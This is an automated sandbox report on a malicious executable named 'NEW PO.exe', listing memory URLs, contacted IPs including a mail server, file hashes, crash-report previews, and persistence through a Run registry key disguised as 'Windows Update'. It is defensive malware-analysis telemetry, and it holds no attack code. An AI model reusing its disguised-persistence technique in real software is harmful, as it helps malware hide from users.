http://www.fontbureau.com/designers/frere-jones.html	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674	vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1	vbc.exe, 0000000A.00000003.329353144.0000000002963000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415661775.0000000002A36000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false		high
https://www.google.com/accounts/servicelogin	vbc.exe	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/	WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g	vbc.exe, 0000000A.00000003.329276630.000000000059D000.00000004.00000001.sdmp, vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 0000000A.00000003.329666537.0000000002871000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415728585.0000000002941000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.152.32.10	mail.inbox.lv	Latvia		12993	DEAC-ASLV	false
104.16.155.36	whatismyipaddress.com	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	511007
Start date:	28.10.2021
Start time:	14:42:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	NEW PO.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@22/22@4/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 2.6% (good quality ratio 2.2%) Quality average: 69% Quality standard deviation: 36.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 192 Number of non-executed functions: 279
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.82.210.154, 40.126.31.139, 40.126.31.1, 40.126.31.137, 40.126.31.141, 20.190.159.134, 40.126.31.4, 40.126.31.6, 20.190.159.136, 104.208.16.94, 13.107.4.50, 20.199.120.85, 20.199.120.151, 52.251.79.25, 20.54.110.249, 80.67.82.235, 80.67.82.211, 40.91.112.76, 40.112.88.60, 20.199.120.182, 52.182.143.212 Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, b1ns.c-0001.c-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, b1ns.au-msedge.net, onedsblobprdcus16.centralus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:43:04	API Interceptor	30x Sleep call for process: NEW PO.exe modified
14:43:16	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
14:43:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
14:43:27	API Interceptor	25x Sleep call for process: WindowsUpdate.exe modified
14:43:35	API Interceptor	2x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NEW PO.exe_8055783c936bcb979ba1bb535241e11f1ba84c43_9f8533cf_1bd60d79\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.315991209012618
Encrypted:	false
SSDEEP:	192:8vGZVHBUZMXyaPXUlXK8zIUGrf/u7sjS274Itw9:kGbBUZMXyascf/u7sjX4Itw9
MD5:	4BF5AECA5BB4D456B80A0893C8B0A06F
SHA1:	2A6B42F5FBFE0D2C9B0A9F6197A718071C0787FF
SHA-256:	7600030D4651A32743C99EAF12CD95408762D31B91EEF6CCA2B670C285BD5669
SHA-512:	0FB1526C720E879D40A7C3C94716B9259930D7FB02EBDCB7A6AC27F7AFB5A5D61242243BE2E9996BD457327609EA848F7A9AAC422D35A8A14131AA833A9046E8
Malicious:	true
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.9.3.1.0.0.3.0.0.9.3.0.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.9.3.1.0.1.3.8.0.6.1.5.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.a.b.a.d.0.0.-.5.f.f.2.-.4.5.5.a.-.9.9.d.6.-.e.8.d.8.0.7.9.5.1.1.3.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.0.6.2.2.4.2.-.7.d.6.5.-.4.7.3.0.-.9.1.9.2.-.f.c.f.a.1.a.1.d.0.d.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.E.W. .P.O...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.L.R.S.u.r.r.o.g.a.t.e.E.n.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.9.c.-.0.0.0.1.-.0.0.1.c.-.1.b.b.b.-.0.e.c.a.4.4.c.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.5.a.5.0.3.3.1.0.1.f.6.3.6.c.0.6.3.d.c.0.6.b.9.d.b.8.1.0.7.0.f.0.0.0.0.0.0.0.0.!.0.0.0.0.e.d.9.6.d.1.7.9.4.0.3.a.b.3.1.9.d.a.6.2.c.0.9.2.a.8.1.7.a.5.e.b.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WindowsUpdate.ex_f9725cf91236fb8dfe1d0104b8abc11733cfe3b_2f3b6c15_171ed716\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.317492010859222
Encrypted:	false
SSDEEP:	192:7OPtFZVHBUZMXSaPXUlXK8zIUGrq/u7sjS274ItT:stFbBUZMXSascq/u7sjX4ItT
MD5:	B1FA9A9909F2FC460215410189DAD479
SHA1:	3593C650A86C5CE4F8DC6C624E710C9F78C2A3AB
SHA-256:	B60A4E81770237FFD38D5061B828D2D1D07A1FA7F31EA576473D72A0BFAC0E76
SHA-512:	24863AE1A8EA8411BDBB89ED9EFDD2DD7FDDD7589387A9467D06D8D53EA177EF3656DC2243FD08468204B56D9916F05F509679329A792FCCC1813D97E24B1AC1
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.9.3.1.0.4.0.7.0.0.2.6.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.9.3.1.0.5.0.5.4.4.0.0.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.3.e.0.c.b.9.-.3.e.6.2.-.4.a.3.4.-.8.6.9.3.-.e.a.8.7.1.d.f.f.6.d.8.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.b.7.3.2.f.2.-.0.3.a.6.-.4.c.3.5.-.a.4.b.4.-.1.d.d.f.7.7.7.a.0.d.f.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.n.d.o.w.s.U.p.d.a.t.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.L.R.S.u.r.r.o.g.a.t.e.E.n.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.9.c.-.0.0.0.1.-.0.0.1.c.-.f.d.9.d.-.5.4.d.e.4.4.c.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.5.a.5.0.3.3.1.0.1.f.6.3.6.c.0.6.3.d.c.0.6.b.9.d.b.8.1.0.7.0.f.0.0.0.0.0.0.0.0.!.0.0.0.0.e.d.9.6.d.1.7.9.4.0.3.a.b.3.1.9.d.a.6.2.c.0.9.2.a.8.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6775.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Oct 28 21:43:27 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	449964
Entropy (8bit):	3.6035865303609618
Encrypted:	false
SSDEEP:	3072:DmVJqTllF9gIOgF5wSw10pi9UCgUVIYYFx3oNTwegf0Yr9xjd+pMBlRZwD72p:DuqTllF9RpD2xTjKQceC0YrQp
MD5:	EA0FD51B403912177C2B26EBDD1A5AB1
SHA1:	DD8B91956C56A71A99A95EB18CD8C6BA56C21AB2
SHA-256:	3D5B6410713940502934605B857F2F358ADA5C3F8211C4B803594B6E2CBEAA42
SHA-512:	155D054675CF0872A8C98BDF0789506801A99E86C44A00E8656D07510E33BDFF262AE166CCF89500445202D983DDC3D5FE5BAF7CBEA8C40F8A85106AE050A0A5
Malicious:	false
Reputation:	unknown
Preview:	MDMP....... .........{a............T............%..h.......<...d1.......=..............`.......8...........T............]...............1...........3...................................................................U...........B......$4......GenuineIntelW...........T...........i.{a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7FB2.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8336
Entropy (8bit):	3.689893445241779
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiEG6lo/6Yno6RgmfZPgSRCprx89bXysf69m:RrlsNit6C6Yo6RgmfRgSnXxfZ
MD5:	CFC0F3B85C65720723980E8C1DA197F6
SHA1:	0AE9AC449498FA019FB696E799C5081AEAADF187
SHA-256:	0EDA42A1EB6F0C2030499A5E30895E07DB3C26B92D644E7A5DBCDEB51ACF10DE
SHA-512:	BFAB105DAEEEB2650BA354521C3F46D5D6596C2170EEE3F9A9793869B213F4525FE0DEC6362A1213B22C687B90E070E659E88BF724A3435AC6866FC57FCB08DA
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.4.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER836C.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4720
Entropy (8bit):	4.4547449585238095
Encrypted:	false
SSDEEP:	48:cvIwSD8zsSJgtWI9FJWSC8By8fm8M4JpPWlFy+q8v4PWQe7W6Zkd:uITfgK4SNNJZKAe7WUkd
MD5:	E5DBAA3FCC088650C247209B16E6D90D
SHA1:	2E57CEBC70AD7DE1CF396C0C07280EBFBF290FFE
SHA-256:	05E0F0403A6D803BACE005ABE0255FF2D915E79B3CF64C2C84EBBC2673266914
SHA-512:	40238DFE9C4824AE636196FC2381ED06F987B107C7AB3D00F8743B84BD45021EEC4F19EE8EFDD940F2E18C93F8FE009C220A2D65E38817A048F70E244C46945D
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1230174" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERACBA.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Oct 28 21:44:02 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	439718
Entropy (8bit):	3.7315579748248786
Encrypted:	false
SSDEEP:	3072:xvm3oH9BGjx9gIOgF5zGRyApw0VmUCgUityZdBrvLuWozt/L2Vc0Cjd+peQ7bU/o:xldBG99RpDaPpwhTjZTKR0vpyFe
MD5:	FC30AAB9F9F32DA48F184F0CCA49188B
SHA1:	DC73378F02E183142F72A31583C1C7B40ACE0762
SHA-256:	8155D5002069C5C3C96F62E6581C9411CFBBA02DF8A968831E32A27743FC5233
SHA-512:	DC84C89587A42959806840EF7FECBA1ECB215127F7557E9E63B213D582149408F17913CFDBD8F9774CF8552B3E0566B6353BAFAD114B84F17189F4C7E030CCA0
Malicious:	false
Reputation:	unknown
Preview:	MDMP....... .........{a............$............%..8.......$....0.......;..b~..........`.......8...........T............\...Y...........0...........2...................................................................U...........B......p3......GenuineIntelW...........T.............{a............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE20.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8368
Entropy (8bit):	3.6864794615673935
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiqY6PL6Yx36qFRgmfZYgSRCprg89b+ZsfGWKm:RrlsNi96D6YR6qFRgmfSgSU+yfGy
MD5:	650062C22FF749C2444559315E871C75
SHA1:	944F516F87F3DBC9A309BE538F685AB7B0F8C0E0
SHA-256:	5139AC177A5C63F4F4A0C9CD9CB26BA1A316A7ED4EB7AAFF776AED1B2B545BAD
SHA-512:	BF536FAF04DF0F997590FED0494DF9BD60758406FF6E8BA545B361CC31DE26102093342993DEF3280E39C459974B4649CF8B41BBE921B97DAF9942B2B9782D9D
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.9.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC48A.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4755
Entropy (8bit):	4.461257300281675
Encrypted:	false
SSDEEP:	48:cvIwSD8zsSJgtWI9FJWSC8BX8fm8M4JZPWlFw9+q8vnPW3eadoZkd:uITfgK4SNyJZKueadSkd
MD5:	478C37E58C9ED9F7B169C268F097CEF6
SHA1:	51A1BE08A636F85E1A5F76DE8FF353C069F25986
SHA-256:	4A78098278530B111978CDE087D9AD979591F8CA0D2FB86849FB2AD0307869A6
SHA-512:	3B431CAE51FCD9013985FAC93A971ED0C8DDF9A0B9420EC4E84D43AFFAEFF76E79621197D9E86E58DB1450FA89F2B9493573D632C1AA7F2E9626C9DF07618F37
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1230174" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW PO.exe.log Download File
Process:	C:\Users\user\Desktop\NEW PO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WindowsUpdate.exe.log Download File
Process:	C:\Users\user\AppData\Roaming\WindowsUpdate.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\bhv94FC.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x0456f320, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	1.0515290357457872
Encrypted:	false
SSDEEP:	24576:dVqA2TaAxucRfDw/ND0Xko5QqbMgSFDb7uBi:uRfD3y
MD5:	5B2767DB09030D6BFA3DECDD780AA574
SHA1:	5A863841DFF01C3C305CFEB9C652D0E6B6976DB1
SHA-256:	C14996019A48718A5DB499651C737EB902699611C66087EB7B78EEC49FB7F09A
SHA-512:	EFB28E20C19138610139095BDD9A30F9B02459A5DC9ECBDFBCFEF6446C4A732BB19BD75B4800A66ED8DB10A273E42D47322770D209B01ADC2BB7A98E2DB99F61
Malicious:	false
Reputation:	unknown
